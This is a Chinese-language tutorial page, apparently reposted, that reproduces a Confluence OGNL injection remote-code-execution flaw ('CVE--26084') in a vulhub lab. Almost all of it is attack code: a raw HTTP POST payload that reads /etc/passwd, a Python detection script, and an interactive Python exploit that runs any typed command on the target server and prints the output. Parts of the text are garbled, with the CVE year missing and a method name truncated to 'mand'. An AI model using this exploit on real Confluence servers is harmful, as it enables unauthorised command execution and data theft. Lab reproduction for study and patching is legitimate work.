700字范文 > Atlassian Confluence OGNL表达式注入代码执行漏洞（CVE--26084）

Atlassian Confluence OGNL表达式注入代码执行漏洞（CVE--26084）

时间：2023-04-19 15:00:23

环境搭建：

使用vulhub，进入文件夹启动环境：

docker-compose up -d

环境启动后，访问http://your-ip:8090即可进入安装向导，参考CVE--3396这个环境中的安装方法，申请试用版许可证。在填写数据库信息的页面，PostgreSQL数据库地址为db，数据库名称confluence，用户名密码均为postgres。

漏洞复现：

POST /pages/createpage-entervariables.action HTTP/1.1Host: 192.168.33.170:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 1075queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat+/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%mand%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%mand%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027

POC编写：

import requestsurl = "http://192.168.33.170:8090/"bug = "pages/createpage-entervariables.action"data = {"queryString": "\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022echo wwwq|md5sum\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){mand(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{mand(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027\r\n"}r = requests.post(url+bug, data=data)if "c0f07f528bbb4eed25c97370610a7c8e" in r.text: # 执行的 echo wwwq|md5sum 命令print("CVE--26084 存在")

pycharm运行结果：

EXP编写：

import requestsfrom bs4 import BeautifulSoupurl = "http://192.168.33.170:8090/"bug = "pages/createpage-entervariables.action"data = {"queryString": "\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022echo wwwq|md5sum\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){mand(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{mand(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027\r\n"}r = requests.post(url+bug, data=data)if "c0f07f528bbb4eed25c97370610a7c8e" in r.text: # 执行的 echo wwwq|md5sum 命令print("CVE--26084 存在")while 1:cmd = input("请输入你要执行的命令:")data = {"queryString": "\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){mand(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{mand(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027\r\n"}exp_res = requests.post(url+bug, data=data)soup = BeautifulSoup(exp_res.text, 'lxml') #创建BeautifulSoup对象cmd_res = soup.find("input",{'name':'queryString'}) #提取标签print(str(cmd_res)[48:-6]) # 只打印命令执行的结果

pycharm运行结果：

本内容不代表本网观点和政治立场，如有侵犯你的权益请联系我们处理。

网友评论

网友评论仅供其表达个人看法，并不表明网站立场。